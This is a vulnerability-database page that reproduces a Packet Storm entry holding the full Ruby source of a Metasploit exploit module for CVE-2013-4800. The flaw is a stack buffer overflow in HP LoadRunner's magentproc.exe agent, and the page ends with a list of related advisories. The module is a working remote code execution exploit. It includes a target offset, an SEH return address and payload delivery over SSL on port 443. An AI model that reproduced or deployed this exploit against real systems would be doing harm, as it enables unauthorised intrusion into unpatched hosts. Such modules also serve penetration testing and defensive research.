Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJuan vazquezPACKETSTORM:123533
HistoryOct 07, 2013 - 12:00 a.m.

HP LoadRunner magentproc.exe Overflow

2013-10-0700:00:00
juan vazquez
packetstormsecurity.com
27

0.967 High

EPSS

Percentile

99.6%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'HP LoadRunner magentproc.exe Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The  
vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending  
a specially crafted packet, an attacker may be able to execute arbitrary code.  
},  
'Author' =>  
[  
'Unknown', # Original discovery # From Tenable Network Security  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2013-4800'],  
['OSVDB', '95644'],  
['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']  
],  
'Privileged' => false,  
'DefaultOptions' =>  
{  
'SSL' => true,  
'SSLVersion' => 'SSL3',  
'PrependMigrate' => true  
},  
'Payload' =>  
{  
'Space' => 4096,  
'DisableNops' => true,  
'BadChars' => "\x00",  
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500  
},  
'Platform' => 'win',  
'DefaultTarget' => 0,  
'Targets' =>  
[  
[  
'Windows XP SP3 / HP LoadRunner 11.50',  
{  
# magentproc.exe 11.50.2042.0  
'Offset' => 1104,  
'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates  
'Crash' => 6000 # Length needed to ensure an exception  
}  
]  
],  
'DisclosureDate' => 'Jul 27 2013'))  
  
register_options([Opt::RPORT(443)], self.class)  
end  
  
def exploit  
  
req = [0xffffffff].pack("N") # Fake Length  
req << rand_text(target['Offset'])  
req << generate_seh_record(target.ret)  
req << payload.encoded  
req << rand_text(target['Crash'])  
  
connect  
print_status("Sending malicious request...")  
sock.put(req)  
disconnect  
  
end  
end  
`

Related

zdt 1
openvas 1
prion 1
zdi 1
nessus 2
checkpoint_advisories 1
attackerkb 1
cve 1
securityvulns 2
zdt
zdt
HP LoadRunner magentproc.exe Overflow Vulnerability
2013-10-08 00:00:00
openvas
openvas
HPE LoadRunner 'magentproc.exe' Stack Buffer Overflow Vulnerability
2017-02-03 00:00:00
prion
prion
Code injection
2013-07-29 13:59:00
zdi
zdi
Hewlett-Packard LoadRunner Stack Buffer Overflow Remote Code Execution Vulnerability
2013-07-26 00:00:00
nessus
nessus
HP LoadRunner < 11.52 SSL Connection Handling Stack Buffer Overflow RCE
2013-08-15 00:00:00
Mercury LoadRunner Agent server_ip_name Field Remote Buffer Overflow
2007-02-13 00:00:00
checkpoint_advisories
checkpoint_advisories
HP LoadRunner magentproc.exe Stack Buffer Overflow (CVE-2013-4800)
2013-10-27 00:00:00
attackerkb
attackerkb
CVE-2013-4800 HP LoadRunner magentproc.exe Overflow
2013-07-29 00:00:00
cve
cve
CVE-2013-4800
2013-07-29 13:59:00
securityvulns
securityvulns
[security bulletin] HPSBGN02905 rev.1 - HP LoadRunner, Remote Code Execution and Denial of Service &#40;DoS&#41;
2013-07-29 00:00:00
HP LoadRunner multiple security vulnerabilities
2013-07-29 00:00:00

0.967 High

EPSS

Percentile

99.6%

JSON
Related for PACKETSTORM:123533
zdt1openvas1prion1zdi1nessus2checkpoint_advisories1attackerkb1cve1securityvulns2